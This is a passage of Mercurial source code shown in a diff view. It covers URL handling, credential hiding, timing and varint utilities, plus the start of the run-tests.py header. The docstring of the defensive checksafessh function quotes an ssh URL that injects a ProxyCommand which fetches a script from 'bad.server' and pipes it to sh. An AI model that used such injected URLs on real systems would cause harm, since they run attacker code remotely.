3146 'http://localhost:80//'
3147 'http://localhost:80//'
3147 >>> bytes(url(b'http://localhost:80/'))
3148 >>> bytes(url(b'http://localhost:80/'))
3148 'http://localhost:80/'
3149 'http://localhost:80/'
3149 >>> bytes(url(b'http://localhost:80'))
3150 >>> bytes(url(b'http://localhost:80'))
3150 'http://localhost:80/'
3151 'http://localhost:80/'
3151 >>> bytes(url(b'bundle:foo'))
3152 >>> bytes(url(b'bundle:foo'))
3152 'bundle:foo'
3153 'bundle:foo'
3153 >>> bytes(url(b'bundle://../foo'))
3154 >>> bytes(url(b'bundle://../foo'))
3154 'bundle:../foo'
3155 'bundle:../foo'
3155 >>> bytes(url(b'path'))
3156 >>> bytes(url(b'path'))
3156 'path'
3157 'path'
3157 >>> bytes(url(b'file:///tmp/foo/bar'))
3158 >>> bytes(url(b'file:///tmp/foo/bar'))
3158 'file:///tmp/foo/bar'
3159 'file:///tmp/foo/bar'
3159 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3160 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3160 'file:///c:/tmp/foo/bar'
3161 'file:///c:/tmp/foo/bar'
3161 >>> print(url(br'bundle:foo\bar'))
3162 >>> print(url(br'bundle:foo\bar'))
3162 bundle:foo\bar
3163 bundle:foo\bar
3163 >>> print(url(br'file:///D:\data\hg'))
3164 >>> print(url(br'file:///D:\data\hg'))
3164 file:///D:\data\hg
3165 file:///D:\data\hg
3165 """
3166 """
3166 if self._localpath:
3167 if self._localpath:
3167 s = self.path
3168 s = self.path
3168 if self.scheme == b'bundle':
3169 if self.scheme == b'bundle':
3169 s = b'bundle:' + s
3170 s = b'bundle:' + s
3170 if self.fragment:
3171 if self.fragment:
3171 s += b'#' + self.fragment
3172 s += b'#' + self.fragment
3172 return s
3173 return s
3173
3174
3174 s = self.scheme + b':'
3175 s = self.scheme + b':'
3175 if self.user or self.passwd or self.host:
3176 if self.user or self.passwd or self.host:
3176 s += b'//'
3177 s += b'//'
3177 elif self.scheme and (
3178 elif self.scheme and (
3178 not self.path
3179 not self.path
3179 or self.path.startswith(b'/')
3180 or self.path.startswith(b'/')
3180 or hasdriveletter(self.path)
3181 or hasdriveletter(self.path)
3181 ):
3182 ):
3182 s += b'//'
3183 s += b'//'
3183 if hasdriveletter(self.path):
3184 if hasdriveletter(self.path):
3184 s += b'/'
3185 s += b'/'
3185 if self.user:
3186 if self.user:
3186 s += urlreq.quote(self.user, safe=self._safechars)
3187 s += urlreq.quote(self.user, safe=self._safechars)
3187 if self.passwd:
3188 if self.passwd:
3188 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3189 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3189 if self.user or self.passwd:
3190 if self.user or self.passwd:
3190 s += b'@'
3191 s += b'@'
3191 if self.host:
3192 if self.host:
3192 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3193 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3193 s += urlreq.quote(self.host)
3194 s += urlreq.quote(self.host)
3194 else:
3195 else:
3195 s += self.host
3196 s += self.host
3196 if self.port:
3197 if self.port:
3197 s += b':' + urlreq.quote(self.port)
3198 s += b':' + urlreq.quote(self.port)
3198 if self.host:
3199 if self.host:
3199 s += b'/'
3200 s += b'/'
3200 if self.path:
3201 if self.path:
3201 # TODO: similar to the query string, we should not unescape the
3202 # TODO: similar to the query string, we should not unescape the
3202 # path when we store it, the path might contain '%2f' = '/',
3203 # path when we store it, the path might contain '%2f' = '/',
3203 # which we should *not* escape.
3204 # which we should *not* escape.
3204 s += urlreq.quote(self.path, safe=self._safepchars)
3205 s += urlreq.quote(self.path, safe=self._safepchars)
3205 if self.query:
3206 if self.query:
3206 # we store the query in escaped form.
3207 # we store the query in escaped form.
3207 s += b'?' + self.query
3208 s += b'?' + self.query
3208 if self.fragment is not None:
3209 if self.fragment is not None:
3209 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3210 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3210 return s
3211 return s
3211
3212
3212 __str__ = encoding.strmethod(__bytes__)
3213 __str__ = encoding.strmethod(__bytes__)
3213
3214
3214 def authinfo(self):
3215 def authinfo(self):
3215 user, passwd = self.user, self.passwd
3216 user, passwd = self.user, self.passwd
3216 try:
3217 try:
3217 self.user, self.passwd = None, None
3218 self.user, self.passwd = None, None
3218 s = bytes(self)
3219 s = bytes(self)
3219 finally:
3220 finally:
3220 self.user, self.passwd = user, passwd
3221 self.user, self.passwd = user, passwd
3221 if not self.user:
3222 if not self.user:
3222 return (s, None)
3223 return (s, None)
3223 # authinfo[1] is passed to urllib2 password manager, and its
3224 # authinfo[1] is passed to urllib2 password manager, and its
3224 # URIs must not contain credentials. The host is passed in the
3225 # URIs must not contain credentials. The host is passed in the
3225 # URIs list because Python < 2.4.3 uses only that to search for
3226 # URIs list because Python < 2.4.3 uses only that to search for
3226 # a password.
3227 # a password.
3227 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3228 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3228
3229
3229 def isabs(self):
3230 def isabs(self):
3230 if self.scheme and self.scheme != b'file':
3231 if self.scheme and self.scheme != b'file':
3231 return True # remote URL
3232 return True # remote URL
3232 if hasdriveletter(self.path):
3233 if hasdriveletter(self.path):
3233 return True # absolute for our purposes - can't be joined()
3234 return True # absolute for our purposes - can't be joined()
3234 if self.path.startswith(br'\\'):
3235 if self.path.startswith(br'\\'):
3235 return True # Windows UNC path
3236 return True # Windows UNC path
3236 if self.path.startswith(b'/'):
3237 if self.path.startswith(b'/'):
3237 return True # POSIX-style
3238 return True # POSIX-style
3238 return False
3239 return False
3239
3240
3240 def localpath(self):
3241 def localpath(self):
3241 if self.scheme == b'file' or self.scheme == b'bundle':
3242 if self.scheme == b'file' or self.scheme == b'bundle':
3242 path = self.path or b'/'
3243 path = self.path or b'/'
3243 # For Windows, we need to promote hosts containing drive
3244 # For Windows, we need to promote hosts containing drive
3244 # letters to paths with drive letters.
3245 # letters to paths with drive letters.
3245 if hasdriveletter(self._hostport):
3246 if hasdriveletter(self._hostport):
3246 path = self._hostport + b'/' + self.path
3247 path = self._hostport + b'/' + self.path
3247 elif (
3248 elif (
3248 self.host is not None and self.path and not hasdriveletter(path)
3249 self.host is not None and self.path and not hasdriveletter(path)
3249 ):
3250 ):
3250 path = b'/' + path
3251 path = b'/' + path
3251 return path
3252 return path
3252 return self._origpath
3253 return self._origpath
3253
3254
3254 def islocal(self):
3255 def islocal(self):
3255 '''whether localpath will return something that posixfile can open'''
3256 '''whether localpath will return something that posixfile can open'''
3256 return (
3257 return (
3257 not self.scheme
3258 not self.scheme
3258 or self.scheme == b'file'
3259 or self.scheme == b'file'
3259 or self.scheme == b'bundle'
3260 or self.scheme == b'bundle'
3260 )
3261 )
3261
3262
3262
3263
3263 def hasscheme(path):
3264 def hasscheme(path):
3264 return bool(url(path).scheme)
3265 return bool(url(path).scheme)
3265
3266
3266
3267
3267 def hasdriveletter(path):
3268 def hasdriveletter(path):
3268 return path and path[1:2] == b':' and path[0:1].isalpha()
3269 return path and path[1:2] == b':' and path[0:1].isalpha()
3269
3270
3270
3271
3271 def urllocalpath(path):
3272 def urllocalpath(path):
3272 return url(path, parsequery=False, parsefragment=False).localpath()
3273 return url(path, parsequery=False, parsefragment=False).localpath()
3273
3274
3274
3275
3275 def checksafessh(path):
3276 def checksafessh(path):
3276 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3277 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3277
3278
3278 This is a sanity check for ssh urls. ssh will parse the first item as
3279 This is a sanity check for ssh urls. ssh will parse the first item as
3279 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3280 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3280 Let's prevent these potentially exploited urls entirely and warn the
3281 Let's prevent these potentially exploited urls entirely and warn the
3281 user.
3282 user.
3282
3283
3283 Raises an error.Abort when the url is unsafe.
3284 Raises an error.Abort when the url is unsafe.
3284 """
3285 """
3285 path = urlreq.unquote(path)
3286 path = urlreq.unquote(path)
3286 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3287 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3287 raise error.Abort(
3288 raise error.Abort(
3288 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3289 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3289 )
3290 )
3290
3291
3291
3292
3292 def hidepassword(u):
3293 def hidepassword(u):
3293 '''hide user credential in a url string'''
3294 '''hide user credential in a url string'''
3294 u = url(u)
3295 u = url(u)
3295 if u.passwd:
3296 if u.passwd:
3296 u.passwd = b'***'
3297 u.passwd = b'***'
3297 return bytes(u)
3298 return bytes(u)
3298
3299
3299
3300
3300 def removeauth(u):
3301 def removeauth(u):
3301 '''remove all authentication information from a url string'''
3302 '''remove all authentication information from a url string'''
3302 u = url(u)
3303 u = url(u)
3303 u.user = u.passwd = None
3304 u.user = u.passwd = None
3304 return bytes(u)
3305 return bytes(u)
3305
3306
3306
3307
3307 timecount = unitcountfn(
3308 timecount = unitcountfn(
3308 (1, 1e3, _(b'%.0f s')),
3309 (1, 1e3, _(b'%.0f s')),
3309 (100, 1, _(b'%.1f s')),
3310 (100, 1, _(b'%.1f s')),
3310 (10, 1, _(b'%.2f s')),
3311 (10, 1, _(b'%.2f s')),
3311 (1, 1, _(b'%.3f s')),
3312 (1, 1, _(b'%.3f s')),
3312 (100, 0.001, _(b'%.1f ms')),
3313 (100, 0.001, _(b'%.1f ms')),
3313 (10, 0.001, _(b'%.2f ms')),
3314 (10, 0.001, _(b'%.2f ms')),
3314 (1, 0.001, _(b'%.3f ms')),
3315 (1, 0.001, _(b'%.3f ms')),
3315 (100, 0.000001, _(b'%.1f us')),
3316 (100, 0.000001, _(b'%.1f us')),
3316 (10, 0.000001, _(b'%.2f us')),
3317 (10, 0.000001, _(b'%.2f us')),
3317 (1, 0.000001, _(b'%.3f us')),
3318 (1, 0.000001, _(b'%.3f us')),
3318 (100, 0.000000001, _(b'%.1f ns')),
3319 (100, 0.000000001, _(b'%.1f ns')),
3319 (10, 0.000000001, _(b'%.2f ns')),
3320 (10, 0.000000001, _(b'%.2f ns')),
3320 (1, 0.000000001, _(b'%.3f ns')),
3321 (1, 0.000000001, _(b'%.3f ns')),
3321 )
3322 )
3322
3323
3323
3324
3324 @attr.s
3325 @attr.s
3325 class timedcmstats(object):
3326 class timedcmstats(object):
3326 """Stats information produced by the timedcm context manager on entering."""
3327 """Stats information produced by the timedcm context manager on entering."""
3327
3328
3328 # the starting value of the timer as a float (meaning and resulution is
3329 # the starting value of the timer as a float (meaning and resulution is
3329 # platform dependent, see util.timer)
3330 # platform dependent, see util.timer)
3330 start = attr.ib(default=attr.Factory(lambda: timer()))
3331 start = attr.ib(default=attr.Factory(lambda: timer()))
3331 # the number of seconds as a floating point value; starts at 0, updated when
3332 # the number of seconds as a floating point value; starts at 0, updated when
3332 # the context is exited.
3333 # the context is exited.
3333 elapsed = attr.ib(default=0)
3334 elapsed = attr.ib(default=0)
3334 # the number of nested timedcm context managers.
3335 # the number of nested timedcm context managers.
3335 level = attr.ib(default=1)
3336 level = attr.ib(default=1)
3336
3337
3337 def __bytes__(self):
3338 def __bytes__(self):
3338 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3339 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3339
3340
3340 __str__ = encoding.strmethod(__bytes__)
3341 __str__ = encoding.strmethod(__bytes__)
3341
3342
3342
3343
3343 @contextlib.contextmanager
3344 @contextlib.contextmanager
3344 def timedcm(whencefmt, *whenceargs):
3345 def timedcm(whencefmt, *whenceargs):
3345 """A context manager that produces timing information for a given context.
3346 """A context manager that produces timing information for a given context.
3346
3347
3347 On entering a timedcmstats instance is produced.
3348 On entering a timedcmstats instance is produced.
3348
3349
3349 This context manager is reentrant.
3350 This context manager is reentrant.
3350
3351
3351 """
3352 """
3352 # track nested context managers
3353 # track nested context managers
3353 timedcm._nested += 1
3354 timedcm._nested += 1
3354 timing_stats = timedcmstats(level=timedcm._nested)
3355 timing_stats = timedcmstats(level=timedcm._nested)
3355 try:
3356 try:
3356 with tracing.log(whencefmt, *whenceargs):
3357 with tracing.log(whencefmt, *whenceargs):
3357 yield timing_stats
3358 yield timing_stats
3358 finally:
3359 finally:
3359 timing_stats.elapsed = timer() - timing_stats.start
3360 timing_stats.elapsed = timer() - timing_stats.start
3360 timedcm._nested -= 1
3361 timedcm._nested -= 1
3361
3362
3362
3363
3363 timedcm._nested = 0
3364 timedcm._nested = 0
3364
3365
3365
3366
3366 def timed(func):
3367 def timed(func):
3367 '''Report the execution time of a function call to stderr.
3368 '''Report the execution time of a function call to stderr.
3368
3369
3369 During development, use as a decorator when you need to measure
3370 During development, use as a decorator when you need to measure
3370 the cost of a function, e.g. as follows:
3371 the cost of a function, e.g. as follows:
3371
3372
3372 @util.timed
3373 @util.timed
3373 def foo(a, b, c):
3374 def foo(a, b, c):
3374 pass
3375 pass
3375 '''
3376 '''
3376
3377
3377 def wrapper(*args, **kwargs):
3378 def wrapper(*args, **kwargs):
3378 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3379 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3379 result = func(*args, **kwargs)
3380 result = func(*args, **kwargs)
3380 stderr = procutil.stderr
3381 stderr = procutil.stderr
3381 stderr.write(
3382 stderr.write(
3382 b'%s%s: %s\n'
3383 b'%s%s: %s\n'
3383 % (
3384 % (
3384 b' ' * time_stats.level * 2,
3385 b' ' * time_stats.level * 2,
3385 pycompat.bytestr(func.__name__),
3386 pycompat.bytestr(func.__name__),
3386 time_stats,
3387 time_stats,
3387 )
3388 )
3388 )
3389 )
3389 return result
3390 return result
3390
3391
3391 return wrapper
3392 return wrapper
3392
3393
3393
3394
3394 _sizeunits = (
3395 _sizeunits = (
3395 (b'm', 2 ** 20),
3396 (b'm', 2 ** 20),
3396 (b'k', 2 ** 10),
3397 (b'k', 2 ** 10),
3397 (b'g', 2 ** 30),
3398 (b'g', 2 ** 30),
3398 (b'kb', 2 ** 10),
3399 (b'kb', 2 ** 10),
3399 (b'mb', 2 ** 20),
3400 (b'mb', 2 ** 20),
3400 (b'gb', 2 ** 30),
3401 (b'gb', 2 ** 30),
3401 (b'b', 1),
3402 (b'b', 1),
3402 )
3403 )
3403
3404
3404
3405
3405 def sizetoint(s):
3406 def sizetoint(s):
3406 '''Convert a space specifier to a byte count.
3407 '''Convert a space specifier to a byte count.
3407
3408
3408 >>> sizetoint(b'30')
3409 >>> sizetoint(b'30')
3409 30
3410 30
3410 >>> sizetoint(b'2.2kb')
3411 >>> sizetoint(b'2.2kb')
3411 2252
3412 2252
3412 >>> sizetoint(b'6M')
3413 >>> sizetoint(b'6M')
3413 6291456
3414 6291456
3414 '''
3415 '''
3415 t = s.strip().lower()
3416 t = s.strip().lower()
3416 try:
3417 try:
3417 for k, u in _sizeunits:
3418 for k, u in _sizeunits:
3418 if t.endswith(k):
3419 if t.endswith(k):
3419 return int(float(t[: -len(k)]) * u)
3420 return int(float(t[: -len(k)]) * u)
3420 return int(t)
3421 return int(t)
3421 except ValueError:
3422 except ValueError:
3422 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3423 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3423
3424
3424
3425
3425 class hooks(object):
3426 class hooks(object):
3426 '''A collection of hook functions that can be used to extend a
3427 '''A collection of hook functions that can be used to extend a
3427 function's behavior. Hooks are called in lexicographic order,
3428 function's behavior. Hooks are called in lexicographic order,
3428 based on the names of their sources.'''
3429 based on the names of their sources.'''
3429
3430
3430 def __init__(self):
3431 def __init__(self):
3431 self._hooks = []
3432 self._hooks = []
3432
3433
3433 def add(self, source, hook):
3434 def add(self, source, hook):
3434 self._hooks.append((source, hook))
3435 self._hooks.append((source, hook))
3435
3436
3436 def __call__(self, *args):
3437 def __call__(self, *args):
3437 self._hooks.sort(key=lambda x: x[0])
3438 self._hooks.sort(key=lambda x: x[0])
3438 results = []
3439 results = []
3439 for source, hook in self._hooks:
3440 for source, hook in self._hooks:
3440 results.append(hook(*args))
3441 results.append(hook(*args))
3441 return results
3442 return results
3442
3443
3443
3444
3444 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3445 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3445 '''Yields lines for a nicely formatted stacktrace.
3446 '''Yields lines for a nicely formatted stacktrace.
3446 Skips the 'skip' last entries, then return the last 'depth' entries.
3447 Skips the 'skip' last entries, then return the last 'depth' entries.
3447 Each file+linenumber is formatted according to fileline.
3448 Each file+linenumber is formatted according to fileline.
3448 Each line is formatted according to line.
3449 Each line is formatted according to line.
3449 If line is None, it yields:
3450 If line is None, it yields:
3450 length of longest filepath+line number,
3451 length of longest filepath+line number,
3451 filepath+linenumber,
3452 filepath+linenumber,
3452 function
3453 function
3453
3454
3454 Not be used in production code but very convenient while developing.
3455 Not be used in production code but very convenient while developing.
3455 '''
3456 '''
3456 entries = [
3457 entries = [
3457 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3458 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3458 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3459 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3459 ][-depth:]
3460 ][-depth:]
3460 if entries:
3461 if entries:
3461 fnmax = max(len(entry[0]) for entry in entries)
3462 fnmax = max(len(entry[0]) for entry in entries)
3462 for fnln, func in entries:
3463 for fnln, func in entries:
3463 if line is None:
3464 if line is None:
3464 yield (fnmax, fnln, func)
3465 yield (fnmax, fnln, func)
3465 else:
3466 else:
3466 yield line % (fnmax, fnln, func)
3467 yield line % (fnmax, fnln, func)
3467
3468
3468
3469
3469 def debugstacktrace(
3470 def debugstacktrace(
3470 msg=b'stacktrace',
3471 msg=b'stacktrace',
3471 skip=0,
3472 skip=0,
3472 f=procutil.stderr,
3473 f=procutil.stderr,
3473 otherf=procutil.stdout,
3474 otherf=procutil.stdout,
3474 depth=0,
3475 depth=0,
3475 prefix=b'',
3476 prefix=b'',
3476 ):
3477 ):
3477 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3478 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3478 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3479 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3479 By default it will flush stdout first.
3480 By default it will flush stdout first.
3480 It can be used everywhere and intentionally does not require an ui object.
3481 It can be used everywhere and intentionally does not require an ui object.
3481 Not be used in production code but very convenient while developing.
3482 Not be used in production code but very convenient while developing.
3482 '''
3483 '''
3483 if otherf:
3484 if otherf:
3484 otherf.flush()
3485 otherf.flush()
3485 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3486 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3486 for line in getstackframes(skip + 1, depth=depth):
3487 for line in getstackframes(skip + 1, depth=depth):
3487 f.write(prefix + line)
3488 f.write(prefix + line)
3488 f.flush()
3489 f.flush()
3489
3490
3490
3491
3491 # convenient shortcut
3492 # convenient shortcut
3492 dst = debugstacktrace
3493 dst = debugstacktrace
3493
3494
3494
3495
3495 def safename(f, tag, ctx, others=None):
3496 def safename(f, tag, ctx, others=None):
3496 """
3497 """
3497 Generate a name that it is safe to rename f to in the given context.
3498 Generate a name that it is safe to rename f to in the given context.
3498
3499
3499 f: filename to rename
3500 f: filename to rename
3500 tag: a string tag that will be included in the new name
3501 tag: a string tag that will be included in the new name
3501 ctx: a context, in which the new name must not exist
3502 ctx: a context, in which the new name must not exist
3502 others: a set of other filenames that the new name must not be in
3503 others: a set of other filenames that the new name must not be in
3503
3504
3504 Returns a file name of the form oldname~tag[~number] which does not exist
3505 Returns a file name of the form oldname~tag[~number] which does not exist
3505 in the provided context and is not in the set of other names.
3506 in the provided context and is not in the set of other names.
3506 """
3507 """
3507 if others is None:
3508 if others is None:
3508 others = set()
3509 others = set()
3509
3510
3510 fn = b'%s~%s' % (f, tag)
3511 fn = b'%s~%s' % (f, tag)
3511 if fn not in ctx and fn not in others:
3512 if fn not in ctx and fn not in others:
3512 return fn
3513 return fn
3513 for n in itertools.count(1):
3514 for n in itertools.count(1):
3514 fn = b'%s~%s~%s' % (f, tag, n)
3515 fn = b'%s~%s~%s' % (f, tag, n)
3515 if fn not in ctx and fn not in others:
3516 if fn not in ctx and fn not in others:
3516 return fn
3517 return fn
3517
3518
3518
3519
3519 def readexactly(stream, n):
3520 def readexactly(stream, n):
3520 '''read n bytes from stream.read and abort if less was available'''
3521 '''read n bytes from stream.read and abort if less was available'''
3521 s = stream.read(n)
3522 s = stream.read(n)
3522 if len(s) < n:
3523 if len(s) < n:
3523 raise error.Abort(
3524 raise error.Abort(
3524 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3525 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3525 % (len(s), n)
3526 % (len(s), n)
3526 )
3527 )
3527 return s
3528 return s
3528
3529
3529
3530
3530 def uvarintencode(value):
3531 def uvarintencode(value):
3531 """Encode an unsigned integer value to a varint.
3532 """Encode an unsigned integer value to a varint.
3532
3533
3533 A varint is a variable length integer of 1 or more bytes. Each byte
3534 A varint is a variable length integer of 1 or more bytes. Each byte
3534 except the last has the most significant bit set. The lower 7 bits of
3535 except the last has the most significant bit set. The lower 7 bits of
3535 each byte store the 2's complement representation, least significant group
3536 each byte store the 2's complement representation, least significant group
3536 first.
3537 first.
3537
3538
3538 >>> uvarintencode(0)
3539 >>> uvarintencode(0)
3539 '\\x00'
3540 '\\x00'
3540 >>> uvarintencode(1)
3541 >>> uvarintencode(1)
3541 '\\x01'
3542 '\\x01'
3542 >>> uvarintencode(127)
3543 >>> uvarintencode(127)
3543 '\\x7f'
3544 '\\x7f'
3544 >>> uvarintencode(1337)
3545 >>> uvarintencode(1337)
3545 '\\xb9\\n'
3546 '\\xb9\\n'
3546 >>> uvarintencode(65536)
3547 >>> uvarintencode(65536)
3547 '\\x80\\x80\\x04'
3548 '\\x80\\x80\\x04'
3548 >>> uvarintencode(-1)
3549 >>> uvarintencode(-1)
3549 Traceback (most recent call last):
3550 Traceback (most recent call last):
3550 ...
3551 ...
3551 ProgrammingError: negative value for uvarint: -1
3552 ProgrammingError: negative value for uvarint: -1
3552 """
3553 """
3553 if value < 0:
3554 if value < 0:
3554 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3555 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3555 bits = value & 0x7F
3556 bits = value & 0x7F
3556 value >>= 7
3557 value >>= 7
3557 bytes = []
3558 bytes = []
3558 while value:
3559 while value:
3559 bytes.append(pycompat.bytechr(0x80 | bits))
3560 bytes.append(pycompat.bytechr(0x80 | bits))
3560 bits = value & 0x7F
3561 bits = value & 0x7F
3561 value >>= 7
3562 value >>= 7
3562 bytes.append(pycompat.bytechr(bits))
3563 bytes.append(pycompat.bytechr(bits))
3563
3564
3564 return b''.join(bytes)
3565 return b''.join(bytes)
3565
3566
3566
3567
3567 def uvarintdecodestream(fh):
3568 def uvarintdecodestream(fh):
3568 """Decode an unsigned variable length integer from a stream.
3569 """Decode an unsigned variable length integer from a stream.
3569
3570
3570 The passed argument is anything that has a ``.read(N)`` method.
3571 The passed argument is anything that has a ``.read(N)`` method.
3571
3572
3572 >>> try:
3573 >>> try:
3573 ... from StringIO import StringIO as BytesIO
3574 ... from StringIO import StringIO as BytesIO
3574 ... except ImportError:
3575 ... except ImportError:
3575 ... from io import BytesIO
3576 ... from io import BytesIO
3576 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3577 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3577 0
3578 0
3578 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3579 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3579 1
3580 1
3580 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3581 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3581 127
3582 127
3582 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3583 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3583 1337
3584 1337
3584 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3585 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3585 65536
3586 65536
3586 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3587 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3587 Traceback (most recent call last):
3588 Traceback (most recent call last):
3588 ...
3589 ...
3589 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3590 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3590 """
3591 """
3591 result = 0
3592 result = 0
3592 shift = 0
3593 shift = 0
3593 while True:
3594 while True:
3594 byte = ord(readexactly(fh, 1))
3595 byte = ord(readexactly(fh, 1))
3595 result |= (byte & 0x7F) << shift
3596 result |= (byte & 0x7F) << shift
3596 if not (byte & 0x80):
3597 if not (byte & 0x80):
3597 return result
3598 return result
3598 shift += 7
3599 shift += 7
3600
3601
3602 # Passing the '' locale means that the locale should be set according to the
3603 # user settings (environment variables).
3604 # Python sometimes avoids setting the global locale settings. When interfacing
3605 # with C code (e.g. the curses module or the Subversion bindings), the global
3606 # locale settings must be initialized correctly. Python 2 does not initialize
3607 # the global locale settings on interpreter startup. Python 3 sometimes
3608 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3609 # explicitly initialize it to get consistent behavior if it's not already
3610 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3611 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3612 # if we can remove this code.
3613 @contextlib.contextmanager
3614 def with_lc_ctype():
3615 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3616 if oldloc == 'C':
3617 try:
3618 try:
3619 locale.setlocale(locale.LC_CTYPE, '')
3620 except locale.Error:
3621 # The likely case is that the locale from the environment
3622 # variables is unknown.
3623 pass
3624 yield
3625 finally:
3626 locale.setlocale(locale.LC_CTYPE, oldloc)
3627 else:
3628 yield
@@ -1,3768 +1,3768 b''
1 #!/usr/bin/env python
1 #!/usr/bin/env python
2 #
2 #
3 # run-tests.py - Run a set of tests on Mercurial
3 # run-tests.py - Run a set of tests on Mercurial
4 #
4 #
5 # Copyright 2006 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Matt Mackall <mpm@selenic.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 # Modifying this script is tricky because it has many modes:
10 # Modifying this script is tricky because it has many modes:
11 # - serial (default) vs parallel (-jN, N > 1)
11 # - serial (default) vs parallel (-jN, N > 1)
12 # - no coverage (default) vs coverage (-c, -C, -s)
12 # - no coverage (default) vs coverage (-c, -C, -s)
13 # - temp install (default) vs specific hg script (--with-hg, --local)
13 # - temp install (default) vs specific hg script (--with-hg, --local)
14 # - tests are a mix of shell scripts and Python scripts
14 # - tests are a mix of shell scripts and Python scripts
15 #
15 #
16 # If you change this script, it is recommended that you ensure you
16 # If you change this script, it is recommended that you ensure you
17 # haven't broken it by running it in various modes with a representative
17 # haven't broken it by running it in various modes with a representative
18 # sample of test scripts. For example:
18 # sample of test scripts. For example:
19 #
19 #
20 # 1) serial, no coverage, temp install:
20 # 1) serial, no coverage, temp install:
21 # ./run-tests.py test-s*
21 # ./run-tests.py test-s*
22 # 2) serial, no coverage, local hg:
22 # 2) serial, no coverage, local hg:
23 # ./run-tests.py --local test-s*
23 # ./run-tests.py --local test-s*
24 # 3) serial, coverage, temp install:
24 # 3) serial, coverage, temp install:
25 # ./run-tests.py -c test-s*
25 # ./run-tests.py -c test-s*
26 # 4) serial, coverage, local hg:
26 # 4) serial, coverage, local hg:
27 # ./run-tests.py -c --local test-s* # unsupported
27 # ./run-tests.py -c --local test-s* # unsupported
28 # 5) parallel, no coverage, temp install:
28 # 5) parallel, no coverage, temp install:
29 # ./run-tests.py -j2 test-s*
29 # ./run-tests.py -j2 test-s*
30 # 6) parallel, no coverage, local hg:
30 # 6) parallel, no coverage, local hg:
31 # ./run-tests.py -j2 --local test-s*
31 # ./run-tests.py -j2 --local test-s*
32 # 7) parallel, coverage, temp install:
32 # 7) parallel, coverage, temp install:
33 # ./run-tests.py -j2 -c test-s* # currently broken
33 # ./run-tests.py -j2 -c test-s* # currently broken
34 # 8) parallel, coverage, local install:
34 # 8) parallel, coverage, local install:
35 # ./run-tests.py -j2 -c --local test-s* # unsupported (and broken)
35 # ./run-tests.py -j2 -c --local test-s* # unsupported (and broken)
36 # 9) parallel, custom tmp dir:
36 # 9) parallel, custom tmp dir:
37 # ./run-tests.py -j2 --tmpdir /tmp/myhgtests
37 # ./run-tests.py -j2 --tmpdir /tmp/myhgtests
38 # 10) parallel, pure, tests that call run-tests:
38 # 10) parallel, pure, tests that call run-tests:
39 # ./run-tests.py --pure `grep -l run-tests.py *.t`
39 # ./run-tests.py --pure `grep -l run-tests.py *.t`
40 #
40 #
41 # (You could use any subset of the tests: test-s* happens to match
41 # (You could use any subset of the tests: test-s* happens to match
42 # enough that it's worth doing parallel runs, few enough that it
42 # enough that it's worth doing parallel runs, few enough that it
43 # completes fairly quickly, includes both shell and Python scripts, and
43 # completes fairly quickly, includes both shell and Python scripts, and
44 # includes some scripts that run daemon processes.)
44 # includes some scripts that run daemon processes.)
45
45
